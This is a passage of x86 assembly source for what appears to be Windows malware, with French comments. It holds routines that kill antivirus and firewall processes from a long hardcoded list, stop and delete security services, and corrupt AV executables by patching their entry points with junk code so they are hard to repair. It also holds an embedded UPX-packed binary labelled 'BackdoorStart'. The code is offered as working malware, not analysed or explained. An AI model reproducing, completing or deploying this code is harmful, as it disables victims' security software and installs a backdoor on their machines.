rep movsb + pop esi + + @@: + dec edi + cmp byte ptr [edi], '\' + jnz @B + and byte ptr [edi], 0 + mov ecx, esp ; ecx = repertoire de l'exe + + + + push edx + + xor eax,eax + push edx + push ebx + push ecx + push eax + push NORMAL_PRIORITY_CLASS + push eax + push eax + push eax + pushad + lea eax, dword ptr [ebp + szSHGetFileInfo] + push eax + push dword ptr [ebp + _Shell32] + Call dword ptr [ebp + _GetProcAddress] + mov ebx, eax + + sub esp, (SIZEOF SHFILEINFO + 80) + mov edi, esp + + push SHGFI_EXETYPE + push SIZEOF SHFILEINFO + push edi + push 0 + push dword ptr [ebp + pFileName] + Call ebx ; Get exe file type + add esp, (SIZEOF SHFILEINFO + 80) + + clc + .IF ax != 'EP' + stc ; Non-PE file, set carry on + .ENDIF + popad + .IF CARRY? + push eax ; Non-PE file, don't use commandline + .ELSE + push esi ; PE file, preserve commandline + .ENDIF + push dword ptr [ebp + pFileName] + lea eax, dword ptr [ebp + szCreateProcessA] + Call K32Api + + pop ebx + + push [ebx+4] + lea eax, dword ptr [ebp + szCloseHandle] + Call K32Api + + + skpexec: + add esp, (600 + 380 + 280 + SIZEOF STARTUPINFO + SIZEOF PROCESS_INFORMATION + 60 ) ; Fix stack + +Return2host: + + + + FreeLib: + + + push dword ptr [ebp + _Shell32] + lea eax,dword ptr [ebp+szFreeLibrary] + Call K32Api + + push dword ptr [ebp + _USER32] + lea eax,dword ptr [ebp+szFreeLibrary] + Call K32Api + + cmp dword ptr [ebp + hSFC], 0 ; Was it loaded ? + jz @F + push dword ptr [ebp + hSFC] + lea eax, dword ptr [ebp + szFreeLibrary] + Call K32Api + @@: + + + push dword ptr [ebp + _ADVAPI32] + lea eax, dword ptr [ebp + szFreeLibrary] + Call K32Api + + cmp dword ptr [ebp + _PSAPI], 0 ; Was it loaded ? + jz @F + push dword ptr [ebp + _PSAPI] + lea eax, dword ptr [ebp + szFreeLibrary] + Call K32Api + @@: + + jmp ZeroShit ; Clear shit And return 2 host + + + + + BytesNeeded dd 0 + + KillAVz proc + + .IF dword ptr [ebp + WinVer] == VER_PLATFORM_WIN32_NT + + + Call KillHostileDrivers ; kill Hostile NT services first + + sub esp, 2500 + mov ebx, esp + lea eax, dword ptr [ebp + BytesNeeded] + push eax + push 2400 + push ebx + lea eax, dword ptr [ebp + szEnumProcesses] + Call PSAPIApi + + + mov esi, ebx + nextone: + mov ecx, dword ptr [esi] + jecxz Skipit + + push ecx + push 0 + push PROCESS_ALL_ACCESS + lea eax, dword ptr [ebp + szOpenProcess] + Call K32Api + + or eax, eax + jz Skipit + + push eax ; <- For CloseHandle + + + sub esp, 300 + mov edi, esp + + push eax + + push 256 + push edi + push 0 + push eax + lea eax, dword ptr [ebp + szGetModuleFileNameExA] + Call PSAPIApi + + pop edx + + sub eax, 4 + js NOgood + + mov eax, edi + Call KillAV + + + mov ecx, (256 / 4) + xor eax, eax + rep stosd + + NOgood: + add esp, 300 + lea eax, dword ptr [ebp + szCloseHandle] + Call K32Api + + Skipit: + add esi, 4 + mov eax, ebx + add eax, 1024 + cmp esi, eax + jle nextone + + Call KillHostileDrivers ; kill Hostile NT services next :) + + add esp, 2500 + + .ELSE + + push 0 + push TH32CS_SNAPPROCESS + lea eax, dword ptr [ebp + szCreateToolhelp32Snapshot] + Call K32Api + inc eax + jz ErrNoSnapshot + dec eax + mov esi, eax + + sub esp, SIZEOF PROCESSENTRY32 + 30 + mov ebx, esp + assume ebx : ptr PROCESSENTRY32 + mov [ebx].dwSize, SIZEOF PROCESSENTRY32 + push ebx + push esi + lea eax, dword ptr [ebp + szProcess32First] + Call K32Api + nextone9x: + + push dword ptr [ebx].th32ProcessID + push 0 + push PROCESS_ALL_ACCESS + lea eax, dword ptr [ebp + szOpenProcess] + Call K32Api + or eax, eax + jz ErrOpen9x + lea edx, dword ptr [ebx].szExeFile + xchg eax, edx + Call KillAV + ErrOpen9x: + push ebx + push esi + lea eax, dword ptr [ebp + szProcess32Next] + Call K32Api + + or eax,eax + jnz nextone9x + + push esi + lea eax, dword ptr [ebp + szCloseHandle] + Call K32Api + + add esp, SIZEOF PROCESSENTRY32 + 30 + assume ebx : nothing + ErrNoSnapshot: + .ENDIF + + ret + + KillAVz endp + +services db "AMON",0 + db "avpg",0 + db "AVPCC",0 + db "Aavmker",0 + db "Avast32 Start as Service",0 + db "AvMon2",0 + db "AvUpdSvc",0 + db "KAVMonitorService",0 + db "NOD32Service",0 + db "PersFw",0 + db "vsmon",0 + db "Vsapint",0 + db "Tmpreflt",0 + db "Tmntsrv",0 + db "Tmfilter",0 + db "PCCPFW",0 + db "PCC_PFW",0 + db "wg3n",0 + db "SmcService",0 + db 0 + + + + KillHostileDrivers proc + + xor esi, esi + push SC_MANAGER_ALL_ACCESS + push esi + push esi + lea eax, dword ptr [ebp + szOpenSCManagerA] + Call ADVAPI32Api + mov ebx, eax + lea esi, dword ptr [ebp + services] + KillServiceLoop: + + push SERVICE_ALL_ACCESS + push esi + push ebx + lea eax, dword ptr [ebp + szOpenServiceA] + Call ADVAPI32Api + mov edi, eax + or edi, edi + jz NextService + push ebx + sub esp, SIZEOF SERVICE_STATUS + 20 + mov ebx, esp + + push ebx + push SERVICE_CONTROL_STOP + push edi + lea eax, dword ptr [ebp + szControlService] + Call ADVAPI32Api + + add esp, SIZEOF SERVICE_STATUS + 20 + pop ebx + + push edi + lea eax, dword ptr [ebp + szDeleteService] + Call ADVAPI32Api + + push edi + lea eax, dword ptr [ebp + szCloseServiceHandle] + Call ADVAPI32Api + NextService: + mov eax, esi + call _strlen + add esi, eax + inc esi + cmp byte ptr [esi],0 ; No more service ? + jz @F ; Exit loop + jmp KillServiceLoop ; Compare with next service + @@: + + push ebx + lea eax, dword ptr [ebp + szCloseServiceHandle] + Call ADVAPI32Api + + ret + KillHostileDrivers endp + + AV_lst db "Autodown.exe",0 + db "Tmntsrv.exe",0 + db "amon.exe",0 + db "avmaisrv.exe",0 + db "avserver.exe",0 + db "nod32.exe",0 + db "nod32cc.exe",0 + db "Zonealarm.exe",0 + db "zapro.exe",0 + db "Wfindv32.exe",0 + db "Webscanx.exe",0 + db "Vsstat.exe",0 + db "Vshwin32.exe",0 + db "Vsecomr.exe",0 + db "Vscan40.exe",0 + db "Vettray.exe",0 + db "Vet95.exe",0 + db "Tds2-Nt.exe",0 + db "Tds2-98.exe",0 + db "Tca.exe",0 + db "Tbscan.exe",0 + db "Sweep95.exe",0 + db "Sphinx.exe",0 + db "Smc.exe",0 + db "Serv95.exe",0 + db "Scrscan.exe",0 + db "Scanpm.exe",0 + db "Scan95.exe",0 + db "Scan32.exe",0 + db "Safeweb.exe",0 + db "Rescue.exe",0 + db "Rav7win.exe",0 + db "Rav7.exe",0 + db "Persfw.exe",0 + db "Pcfwallicon.exe",0 + db "Pccwin98.exe",0 + db "Pccguide.exe",0 + db "Pccclient.exe",0 + db "Pavw.exe",0 + db "Pavsched.exe",0 + db "Pavcl.exe",0 + db "Padmin.exe",0 + db "Outpost.exe",0 + db "Nvc95.exe",0 + db "Nupgrade.exe",0 + db "Normist.exe",0 + db "Nmain.exe",0 + db "Nisum.exe",0 + db "Navwnt.exe",0 + db "Navw32.exe",0 + db "Navnt.exe",0 + db "Navlu32.exe",0 + db "Navapw32.exe",0 + db "N32scanw.exe",0 + db "Mpftray.exe",0 + db "Moolive.exe",0 + db "Luall.exe",0 + db "Lookout.exe",0 + db "Lockdown2000.exe",0 + db "Jedi.exe",0 + db "Iomon98.exe",0 + db "Iface.exe",0 + db "Icsuppnt.exe",0 + db "Icsupp95.exe",0 + db "Icmon.exe",0 + db "Icloadnt.exe",0 + db "Icload95.exe",0 + db "Ibmavsp.exe",0 + db "Ibmasn.exe",0 + db "Iamserv.exe",0 + db "Iamapp.exe",0 + db "Frw.exe",0 + db "Fprot.exe",0 + db "Fp-Win.exe",0 + db "Findviru.exe",0 + db "F-Stopw.exe",0 + db "F-Prot95.exe",0 + db "F-Prot.exe",0 + db "F-Agnt95.exe",0 + db "Espwatch.exe",0 + db "Esafe.exe",0 + db "Ecengine.exe",0 + db "Dvp95_0.exe",0 + db "Dvp95.exe",0 + db "Cleaner3.exe",0 + db "Cleaner.exe",0 + db "Claw95cf.exe",0 + db "Claw95.exe",0 + db "Cfinet32.exe",0 + db "Cfinet.exe",0 + db "Cfiaudit.exe",0 + db "Cfiadmin.exe",0 + db "Blackice.exe",0 + db "Blackd.exe",0 + db "Avwupd32.exe",0 + db "Avwin95.exe",0 + db "Avsched32.exe",0 + db "Avpupd.exe",0 + db "Avptc32.exe",0 + db "avpm.exe",0 + db "Avpdos32.exe",0 + db "Avpcc.exe",0 + db "Avp32.exe",0 + db "Avp.exe",0 + db "Avnt.exe",0 + db "Avkserv.exe",0 + db "Avgctrl.exe",0 + db "Ave32.exe",0 + db "Avconsol.exe",0 + db "Apvxdwin.exe",0 + db "Anti-Trojan.exe",0 + db "Ackwin32.exe",0 + db "_Avpm.exe",0 + db "_Avpcc.exe",0 + db "_Avp32.exe",0 + db "Vsmon.exe",0 + db "Smc.exe",0 + db 0 + + +IsFileAV? proc + ; in : eax = pointer to filename + ; out : eax == 1 if FileName Is a AV one, else eax == 0 + + sub esp, SIZEOF WIN32_FIND_DATA + 50 + + mov edi, esp + + push edi + assume edi : ptr WIN32_FIND_DATA + push eax + lea eax, dword ptr [ebp + szFindFirstFileA] + Call K32Api + lea edi, [edi].cFileName ; Always get the long filename + assume edi : nothing + + push eax + lea eax, dword ptr [ebp + szFindClose] + CAll K32Api + + + + cmp byte ptr [edi+1], ':' + jnz JustExe + + mov eax, edi + + + + Call _strlen + add edi, eax + @@: + dec edi + cmp byte ptr [edi], '\' + jnz @B + inc edi + + JustExe: + lea esi, dword ptr [ebp + AV_lst] + AV_scan_loop: + + push edi + push esi + lea eax, dword ptr [ebp + szlstrcmpiA] ; compare it with one AV ? + Call K32Api + + or eax, eax ; name is matching ? + jnz NotListedAV + + add esp, SIZEOF WIN32_FIND_DATA + 50 + + inc eax ; AV return 1 + ret + + NotListedAV: + mov eax, esi + Call _strlen + add esi, eax + inc esi + cmp byte ptr [esi],0 ; No more AV ? + jz @F ; Exit loop + jmp AV_scan_loop ; Compare with next AV + @@: + add esp, SIZEOF WIN32_FIND_DATA + 50 + xor eax, eax + ret + +IsFileAV? endp + +pid dd 0 + ;test_file db "c:\windows\system32\host.exe",0 + ; in : eax = pointer to filename to process + ; edx = process handle IF the process to be trashed is active ELSE put NULL + + KillAV proc + pushad + mov ebx, eax ; put pointer to filename into ebx + mov dword ptr [ebp + pid], edx + + sub esp, SIZEOF WIN32_FIND_DATA + 50 + mov edi, esp + + push edi + assume edi : ptr WIN32_FIND_DATA + push ebx + lea eax, dword ptr [ebp + szFindFirstFileA] + Call K32Api + lea edi, [edi].cFileName ; Always get the long filename + assume edi : nothing + + push eax + lea eax, dword ptr [ebp + szFindClose] + CAll K32Api + + + + cmp byte ptr [edi+1], ':' + jnz JustExe + + mov eax, edi + Call _strlen + add edi, eax + @@: + dec edi + cmp byte ptr [edi], '\' + jnz @B + inc edi ; reach byte after last '\' + + JustExe: + lea esi, dword ptr [ebp + AV_lst] + + ;pushad + ;push 0 + ;push edi + ;push ebx + ;push 0 + ;lea eax, [ebp + szMessageBoxA] + ;call U32Api + ;popad + AV_scan_loop: + + + + push edi + push esi + lea eax, dword ptr [ebp + szlstrcmpiA] ; compare it with one AV ? + Call K32Api + + + or eax, eax ; name is matching ? + jnz NotListedAV + + + + push dword ptr [edi] + or dword ptr [edi], 20202020h + cmp dword ptr [edi], 'mpva' ; Avp monitor ? + pop dword ptr [edi] + + jz @F ; don't kill it + + mov ecx, dword ptr [ebp + pid] + jecxz @F ; is process running ? no skip + push eax + push ecx + lea eax, dword ptr [ebp + szTerminateProcess] ; kill ! + Call K32Api + @@: + + ;pushad + ;push 0 + ;push edi + ;push ebx + ;push 0 + ;lea eax, [ebp + szMessageBoxA] + ;call U32Api + ;popad + + Call PatchAV ; Extra (may only work when prossess + ; is about to be launched due to + ; the latency time necessary to unload + ; image from the memory and, thus, writing + NotListedAV: ; to the file on disk) + mov eax, esi + Call _strlen + add esi, eax + inc esi + cmp byte ptr [esi],0 ; No more AV ? + jz @F ; Exit loop + jmp AV_scan_loop ; Compare with next AV + @@: + add esp, SIZEOF WIN32_FIND_DATA + 50 + popad + ret + KillAV endp + + + PatchAV proc uses edx ; in : ebx = pointer to full path of file to patch. + pushad + + + + push FILE_ATTRIBUTE_NORMAL + push ebx + lea eax, dword ptr [ebp + szSetFileAttributesA] ; reset attributes + Call K32Api + + + xor esi, esi + push esi + push FILE_ATTRIBUTE_NORMAL + push OPEN_EXISTING + push esi + push FILE_SHARE_READ or FILE_SHARE_WRITE + push GENERIC_READ or GENERIC_WRITE + push ebx + lea eax, dword ptr [ebp + szCreateFileA] + Call K32Api + + inc eax + jz ErrOpen + dec eax + mov dword ptr [ebp + hFile],eax + + + push esi + push esi + push esi + push PAGE_READWRITE + push esi + push dword ptr [ebp + hFile] + lea eax,[ebp+szCreateFileMappingA] + call K32Api + + + + or eax,eax + jz ErrCloseFa + + mov dword ptr [ebp + hMap],eax + + push esi + push esi + push esi + push FILE_MAP_ALL_ACCESS + push dword ptr [ebp+hMap] + lea eax,dword ptr [ebp+szMapViewOfFile] + call K32Api + + test eax,eax + jz ErrShit + + mov dword ptr [ebp + pMap],eax + + cmp word ptr [eax],IMAGE_DOS_SIGNATURE + jnz ErrShit + mov edi,[eax+3ch] + add edi,eax + cmp dword ptr [edi],IMAGE_NT_SIGNATURE + jnz ErrShit + + assume edi : ptr IMAGE_NT_HEADERS + + mov edi,[edi].OptionalHeader.AddressOfEntryPoint + mov esi,dword ptr [ebp + pMap] + Call RVAToOffset ; get raw offset + add eax,dword ptr [ebp + pMap] ; add base address + assume edi : nothing + mov edi,eax + mov al, 0C3h ; patch entrypoint with "return to windows" + stosb + Call Random32 + and eax,07Fh + Call GenTrashBlk ; add shit ... + ; this should make it a bit harder to repair :-) + ErrShit: + Call UnMap + ErrCloseFa: + push dword ptr [ebp+hFile] + lea eax, dword ptr [ebp + szCloseHandle] + Call K32Api + ErrOpen: + + popad + ret + PatchAV endp + + + + + + + + + + + + BackdoorStart db 77,90,144,0,3,0,0,0,4,0,0,0,255,255,0,0 + db 184,0,0,0,0,0,0,0,64,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,176,0,0,0 + db 14,31,186,14,0,180,9,205,33,184,1,76,205,33,84,104 + db 105,115,32,112,114,111,103,114,97,109,32,99,97,110,110,111 + db 116,32,98,101,32,114,117,110,32,105,110,32,68,79,83,32 + db 109,111,100,101,46,13,13,10,36,0,0,0,0,0,0,0 + db 85,217,249,219,17,184,151,136,17,184,151,136,17,184,151,136 + db 17,184,151,136,146,184,151,136,237,152,133,136,19,184,151,136 + db 82,105,99,104,17,184,151,136,0,0,0,0,0,0,0,0 + db 80,69,0,0,76,1,3,0,143,87,26,64,0,0,0,0 + db 0,0,0,0,224,0,15,1,11,1,5,12,0,48,0,0 + db 0,16,0,0,0,192,1,0,48,242,1,0,0,208,1,0 + db 0,0,2,0,0,0,64,0,0,16,0,0,0,2,0,0 + db 4,0,0,0,0,0,0,0,4,0,0,0,0,0,0,0 + db 0,16,2,0,0,16,0,0,0,0,0,0,2,0,0,0 + db 0,0,16,0,0,16,0,0,0,0,16,0,0,16,0,0 + db 0,0,0,0,16,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,2,0,232,1,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,85,80,88,48,0,0,0,0 + db 0,192,1,0,0,16,0,0,0,0,0,0,0,4,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,128,0,0,224 + db 85,80,88,49,0,0,0,0,0,48,0,0,0,208,1,0 + db 0,36,0,0,0,4,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,64,0,0,224,85,80,88,50,0,0,0,0 + db 0,16,0,0,0,0,2,0,0,2,0,0,0,40,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,64,0,0,192 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 + db 0,0,0,0,0,0,0,0,0,0,0,49,46,50,51,0 + db 85,80,88,33,12,9,2,8,175,233,133,239,104,160,181,151 + db 81,216,1,0,45,34,0,0,0,92,0,0,38,1,0,158 + db 223,91,254,255,106,3,232,1,0,59,88,199,5,79,148,64 + db 0,148,0,104,8,19,22,223,255,238,230,131,61,95,2,117 + db 79,13,58,212,104,2,195,65,0,106,40,80,26,190,92,190 + db 221,237,104,144,97,25,104,156,4,106,0,63,184,140,97,175 + db 105,54,179,1,9,152,2,106,1,249,247,142,108,37,140,255 + db 53,63,60,148,104,0,96,99,187,255,158,4,88,20,11,192 + db 117,55,8,50,130,74,58,205,221,125,246,254,163,12,137,25 + db 194,163,16,9,131,37,20,41,65,239,96,239,149,10,14,73 + db 32,1,61,140,172,251,253,255,58,158,85,139,236,131,196,232 + db 255,117,248,141,69,252,17,60,24,82,102,123,118,107,182,119 + db 56,98,41,17,6,84,30,244,80,3,117,111,176,238,240,80 + db 25,1,155,247,198,171,128,177,205,246,253,152,214,199,69,85 + db 19,39,232,236,80,65,96,221,183,153,38,90,240,31,220,68 + db 13,11,183,177,246,237,208,139,32,201,195,51,192,3,125,176 + db 58,208,48,236,62,114,115,242,6,212,3,216,30,18,64,13 + db 220,0,114,251,236,141,224,6,183,143,69,228,22,240,6,59 + db 156,112,54,244,29,248,15,127,49,208,101,192,182,246,68,137 + db 128,2,252,17,62,139,117,199,182,236,145,208,238,86,106,143 + db 8,155,61,108,9,175,172,128,4,207,0,96,62,155,125,219 + db 114,57,246,176,51,176,61,110,248,76,118,216,109,100,180,44 + db 210,116,20,12,104,8,255,221,111,31,2,235,217,222,188,201 + db 194,16,0,220,129,196,0,254,255,255,131,125,12,240,159,251 + db 27,8,47,104,222,192,173,222,125,36,56,255,21,240,117,158 + db 61,219,142,93,31,217,218,232,10,58,188,176,80,233,115,161 + db 208,221,4,3,19,52,1,136,192,143,150,239,125,174,123,141 + db 13,115,24,149,139,11,129,81,4,42,3,107,187,177,140,114 + db 116,206,136,19,37,97,51,220,157,225,92,163,28,48,12,143 + db 5,24,8,142,217,220,247,109,80,5,114,141,4,169,27,133 + db 236,187,173,97,187,235,79,129,107,18,122,117,187,68,10,19 + db 1,247,238,183,53,16,8,16,78,117,50,44,7,169,235,43 + db 24,237,221,183,102,13,4,13,221,16,139,77,20,21,53,167 + db 235,21,68,225,61,91,182,20,2,16,12,118,57,252,248,217 + db 216,118,183,153,254,117,225,98,189,116,4,15,28,217,94,107 + db 238,139,212,219,65,1,145,21,14,220,35,75,247,216,161,251 + db 215,65,8,12,255,16,101,100,121,46,3,216,20,7,24,89 + db 70,150,145,11,28,15,32,19,9,228,230,130,24,165,19,23 + db 216,65,101,228,141,127,119,104,40,218,65,204,1,1,0,138 + db 221,223,24,238,15,133,75,236,200,2,18,204,163,184,137,64 + db 217,124,239,241,15,132,47,3,104,140,41,168,132,28,188,212 + db 189,189,139,64,12,139,4,0,163,192,37,102,161,188,219,65 + db 237,220,253,219,106,25,35,174,102,163,190,21,106,16,104,59 + db 15,166,231,123,72,101,162,224,27,60,104,240,10,102,251,61 + db 50,50,48,32,15,197,17,181,198,109,195,182,69,10,71,229 + db 4,112,17,31,106,64,109,115,159,245,222,48,120,16,17,112 + db 163,35,179,138,30,222,179,20,68,81,53,16,96,240,179,237 + db 96,151,47,12,161,12,54,205,46,80,26,185,108,251,101,122 + db 198,131,248,255,183,89,123,53,10,105,110,230,73,79,3,216 + db 91,60,35,7,22,70,2,7,109,224,169,13,148,187,11,130 + db 7,13,31,217,123,49,205,71,38,51,53,52,48,148,205,30 + db 237,146,1,45,35,1,124,56,146,231,225,201,31,255,125,24 + db 76,201,20,214,172,44,166,161,31,223,30,123,79,181,61,184 + db 11,104,118,6,255,5,152,80,17,30,254,101,205,89,3,200 + db 137,13,208,230,4,169,141,246,17,132,81,164,31,241,14,24 + db 177,239,151,153,204,46,139,200,139,61,17,139,102,247,247,34 + db 219,243,164,127,15,19,55,130,104,219,132,121,9,239,178,15 + db 161,9,55,204,219,128,92,114,10,131,0,212,46,123,135,45 + db 158,192,159,171,95,118,164,67,59,53,106,120,9,76,115,88 + db 187,63,120,116,55,161,22,57,5,216,13,117,35,133,245,67 + db 224,166,14,2,106,5,25,192,104,147,150,37,233,252,158,147 + db 134,163,42,131,37,179,236,32,124,147,118,156,4,132,163,116 + db 51,127,132,5,249,28,26,195,27,218,21,193,98,109,200,31 + db 75,52,28,221,235,13,132,229,151,28,34,104,212,129,241,225 + db 39,58,164,195,106,126,27,216,234,133,228,221,203,192,4,117 + db 34,24,1,104,39,218,4,190,127,111,234,231,128,61,21,10 + db 117,222,161,54,195,142,50,207,134,114,124,255,188,0,191,174 + db 117,249,93,200,29,125,31,245,141,61,8,120,185,0,43,214 + db 123,203,238,202,243,171,104,13,17,9,188,125,36,6,80,40 + db 180,104,75,146,23,80,104,21,8,31,193,78,6,34,81,16 + db 19,134,111,96,225,88,80,94,8,120,116,70,141,53,219,65 + db 222,127,134,217,141,5,34,229,61,56,192,89,141,185,17,205 + db 29,110,52,45,33,128,39,118,13,4,71,222,61,205,247,96 + db 219,203,52,86,104,186,96,3,25,3,15,18,177,143,77,49 + db 204,104,231,205,114,7,214,50,181,203,227,25,53,107,104,232 + db 165,123,191,2,18,24,64,174,103,54,247,169,125,18,24,127 + db 0,179,151,125,114,123,35,33,227,148,150,106,15,12,186,197 + db 70,12,10,211,120,115,161,248,223,203,130,140,27,144,163,26 + db 141,117,206,139,254,86,137,8,175,237,52,1,86,26,16,120 + db 18,95,120,96,175,127,141,19,172,60,131,215,88,64,64,4 + db 233,255,255,59,198,116,34,87,176,10,106,50,89,242,174,128 + db 103,255,0,95,139,199,48,224,178,223,44,34,10,243,166,11 + db 201,116,23,56,156,92,98,19,193,252,14,8,202,1,177,25 + db 227,161,83,210,119,163,42,90,10,54,194,194,94,236,100,41 + db 168,64,144,195,114,140,47,27,117,3,92,251,86,112,113,178 + db 199,67,69,254,233,120,114,198,64,83,251,147,185,21,149,20 + db 46,141,133,140,252,41,145,13,55,14,33,83,248,24,147,151 + db 93,161,250,231,224,221,6,105,5,171,87,104,254,29,24,206 + db 71,128,63,27,123,95,88,72,250,118,7,62,0,184,34,215 + db 145,166,54,113,97,175,104,13,95,196,169,128,101,195,221,120 + db 214,254,76,139,247,98,185,250,109,103,130,217,86,66,75,44 + db 151,79,173,224,232,70,67,115,198,86,207,133,126,183,240,43 + db 198,6,32,25,149,71,59,241,114,30,78,78,15,11,216,118 + db 236,251,32,8,49,3,141,10,80,120,101,109,103,123,67,133 + db 157,198,70,1,119,53,61,63,242,105,120,179,93,142,60,36 + db 116,28,12,21,57,103,255,238,27,18,50,9,236,173,13,32 + db 0,151,137,125,251,129,255,105,110,49,129,221,198,102,111,17 + db 213,173,51,219,12,54,7,4,102,120,16,157,1,243,215,27 + db 251,56,92,199,133,103,162,141,9,80,6,69,185,125,103,99 + db 41,178,28,100,252,225,108,231,161,35,100,100,6,104,76,236 + db 236,9,255,200,106,9,104,66,145,230,106,8,90,16,17,235 + db 62,132,87,148,149,104,20,117,34,100,48,236,126,127,237,242 + db 209,12,141,29,120,5,61,190,24,96,86,255,119,177,245,224 + db 6,3,175,6,137,3,198,67,3,32,131,195,4,235,254,151 + db 183,183,17,17,5,116,5,22,2,117,7,171,79,176,32,170 + db 131,198,4,128,2,67,232,23,180,117,207,97,87,83,35,71 + db 203,158,123,195,111,223,235,5,104,122,6,152,188,188,145,222 + db 225,104,133,105,33,223,237,161,9,8,8,111,9,186,13,63 + db 187,15,200,67,34,160,15,116,97,163,247,38,139,240,197,254 + db 28,219,51,255,19,87,135,42,102,139,198,69,176,24,124,220 + db 176,118,37,104,94,86,26,22,253,31,176,110,80,93,86,88 + db 88,3,240,71,131,255,35,117,190,67,129,108,96,178,96,192 + db 112,247,215,11,183,101,135,152,170,20,11,219,185,60,242,220 + db 114,180,253,195,23,179,202,102,118,245,47,92,78,12,233,30 + db 43,224,108,111,103,111,117,113,185,238,194,70,195,248,143,33 + db 49,10,191,6,10,63,205,79,243,235,60,60,50,12,49,60 + db 51,5,38,60,52,141,20,246,52,4,27,85,64,15,110,36 + db 99,26,160,251,162,14,110,23,254,96,120,109,115,103,32,117 + db 73,188,231,210,174,172,170,178,185,209,59,170,250,50,192,170 + db 245,19,47,4,118,15,97,179,5,88,201,100,105,114,233,195 + db 49,182,33,240,218,97,188,254,186,185,104,197,201,114,119,63 + db 176,137,133,184,16,141,189,232,5,130,91,110,180,26,10,148 + db 71,120,30,247,47,90,102,251,17,155,116,6,17,114,150,71 + db 182,238,13,101,255,181,220,21,86,76,232,189,104,174,134,125 + db 97,118,20,235,29,33,252,99,102,96,101,30,254,13,41,130 + db 13,140,23,26,40,162,182,143,190,215,65,152,163,182,63,90 + db 18,255,110,124,132,75,170,76,60,82,69,80,174,32,0,74 + db 33,151,203,229,119,21,1,210,131,0,91,167,67,232,131,251 + db 169,97,33,79,215,59,109,34,78,107,45,141,172,67,21,236 + db 156,110,66,235,106,43,176,4,78,155,28,204,40,48,2,200 + db 5,25,6,153,96,233,114,99,100,117,121,217,28,6,156,61 + db 3,90,61,185,112,102,93,126,6,251,248,74,14,24,1,194 + db 26,27,136,99,3,222,66,0,186,27,108,246,69,82,32,81 + db 105,115,116,161,18,242,233,220,102,98,246,17,228,104,128,223 + db 54,11,40,35,167,28,16,117,127,221,238,235,124,4,9,112 + db 38,21,252,15,190,10,139,14,227,102,172,165,220,117,81,66 + db 219,31,73,46,219,30,158,237,100,139,216,43,1,116,56,83 + db 46,0,128,67,198,177,191,131,232,4,120,68,255,54,20,104 + db 245,136,16,241,190,131,140,184,135,185,239,191,56,223,6,34 + db 125,247,83,101,32,129,254,18,15,190,71,59,195,142,120,102 + db 214,17,133,44,28,146,96,54,186,14,138,129,50,72,108,180 + db 135,247,88,46,213,140,253,40,141,9,167,103,115,219,147,180 + db 59,52,10,148,17,23,176,217,40,105,101,150,31,78,121,152 + db 53,12,58,146,173,14,242,116,90,184,255,3,107,105,108,108 + db 117,123,70,185,40,152,161,126,227,75,45,111,215,198,71,254 + db 0,66,45,117,1,70,86,225,5,111,255,78,48,128,126,255 + db 12,2,247,216,204,76,217,207,80,14,46,66,13,106,80,249 + db 132,23,8,221,88,21,24,247,235,22,244,76,221,254,137,99 + db 118,114,116,117,63,70,125,185,232,171,223,153,161,195,130,104 + db 144,46,86,195,10,108,252,34,51,70,115,114,118,108,23,203 + db 60,135,141,204,74,14,32,255,145,140,29,18,221,57,78,247 + db 57,18,139,132,92,229,129,14,231,2,109,225,129,36,100,115 + db 212,190,11,238,126,154,187,20,14,119,51,50,48,5,190,59 + db 6,102,129,15,247,52,240,214,39,4,63,45,114,251,1,19 + db 13,161,155,99,205,115,2,37,191,3,137,53,34,149,22,217 + db 153,91,5,61,38,100,32,91,214,171,50,179,92,115,148,183 + db 35,49,144,11,230,232,7,48,33,46,69,210,169,103,255,178 + db 159,168,228,162,144,107,196,148,156,40,228,100,34,38,8,217 + db 15,12,102,116,117,112,78,88,172,173,154,198,242,76,81,59 + db 212,107,148,44,82,75,134,12,51,168,137,87,9,175,13,161 + db 22,109,107,13,204,177,35,123,117,83,70,209,106,122,58,128 + db 